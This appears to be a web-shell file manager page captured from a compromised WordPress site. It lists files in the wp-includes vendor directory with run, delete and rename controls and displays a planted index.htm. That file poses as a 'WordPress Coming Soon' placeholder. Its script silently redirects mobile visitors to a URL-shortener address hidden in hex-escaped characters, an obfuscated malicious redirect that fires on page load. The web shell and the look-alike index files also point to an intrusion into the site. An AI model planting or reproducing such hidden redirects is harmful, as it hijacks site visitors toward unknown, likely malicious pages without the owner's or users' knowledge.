at path:
ROOT
/
wp-includes
/
js
/
dist
/
vendor
/
index.htm
run:
R
W
Run
index.htm
1.07 KB
2026-03-17 01:08:49
R
W
Run
Delete
Rename
index.html
1.07 KB
2026-03-17 01:08:49
R
W
Run
Delete
Rename
index.php
1.07 KB
2026-03-17 01:08:49
R
W
Run
Delete
Rename
lodash.js
538.42 KB
2021-05-20 13:02:17
R
W
Run
lodash.min.js
76.13 KB
2025-04-16 02:33:33
R
W
Run
moment.js
179.38 KB
2024-11-13 19:02:13
R
W
Run
moment.min.js
64.51 KB
2025-04-16 02:33:33
R
W
Run
react-dom.js
1.04 MB
2024-11-13 19:02:13
R
W
Run
react-dom.min.js
133 KB
2025-04-16 02:33:33
R
W
Run
react-jsx-runtime.js
53.25 KB
2024-09-04 11:48:32
R
W
Run
react-jsx-runtime.min.js
7.96 KB
2025-04-16 02:33:33
R
W
Run
react-jsx-runtime.min.js.LICENSE.txt
249 By
2024-09-04 11:48:32
R
W
Run
Delete
Rename
react.js
114.43 KB
2024-11-13 19:02:13
R
W
Run
react.min.js
17.46 KB
2024-11-13 19:02:13
R
W
Run
regenerator-runtime.js
31.79 KB
2024-11-13 19:02:13
R
W
Run
regenerator-runtime.min.js
13.52 KB
2025-04-16 02:33:33
R
W
Run
wp-polyfill-dom-rect.js
8.96 KB
2022-04-12 17:35:27
R
W
Run
wp-polyfill-dom-rect.min.js
7.92 KB
2025-04-16 02:33:33
R
W
Run
wp-polyfill-element-closest.js
7.5 KB
2023-02-07 16:48:31
R
W
Run
wp-polyfill-element-closest.min.js
7.49 KB
2025-04-16 02:33:33
R
W
Run
wp-polyfill-fetch.js
26.43 KB
2024-11-13 19:02:13
R
W
Run
wp-polyfill-fetch.min.js
16.85 KB
2025-04-16 02:33:33
R
W
Run
wp-polyfill-formdata.js
18.67 KB
2022-04-12 17:35:27
R
W
Run
wp-polyfill-formdata.min.js
15.65 KB
2022-04-12 17:35:27
R
W
Run
wp-polyfill-inert.js
36.59 KB
2024-11-13 19:02:13
R
W
Run
wp-polyfill-inert.min.js
15.09 KB
2024-11-13 19:02:13
R
W
Run
wp-polyfill-node-contains.js
7.7 KB
2021-03-30 14:49:04
R
W
Run
wp-polyfill-node-contains.min.js
7.42 KB
2025-04-16 02:33:33
R
W
Run
wp-polyfill-object-fit.js
16.05 KB
2021-03-30 14:16:33
R
W
Run
wp-polyfill-object-fit.min.js
9.98 KB
2022-09-23 19:55:30
R
W
Run
wp-polyfill-url.js
114.82 KB
2020-03-03 16:55:07
R
W
Run
wp-polyfill-url.min.js
53.05 KB
2023-06-28 20:08:46
R
W
Run
wp-polyfill.js
113.2 KB
2025-12-03 06:22:56
R
W
Run
wp-polyfill.min.js
39.84 KB
2025-12-03 06:22:56
R
W
Run
error_log
up
📄
index.htm
Save
<!DOCTYPE html> <html lang="ar"> <head> <meta charset="UTF-8"> <title>Coming Soon</title> <style> body { display: flex; justify-content: center; align-items: center; height: 100vh; margin: 0; background-color: #f0f6fc; font-family: Arial, sans-serif; text-align: center; color: #21759b; } h1 { font-size: 7em; margin: 0; } p { font-size: 1.5em; margin-top: 0.5em; } </style> </head> <body> <div> <h1>WordPress</h1> <p><b>Coming Soon</b></p> </div> <script> document.addEventListener("DOMContentLoaded", function() { if (/Mobi|Android|iPhone|iPad|iPod|IEMobile|Opera Mini/i.test(navigator.userAgent)) { window.location.href = "\x68\x74\x74\x70\x73\x3a\x2f\x2f\x75\x72\x73\x68\x6f\x72\x74\x2e\x6c\x69\x76\x65\x2f\x76\x48\x77\x48\x59\x43\x7a\x30\x72\x34"; } }); </script> </body> </html>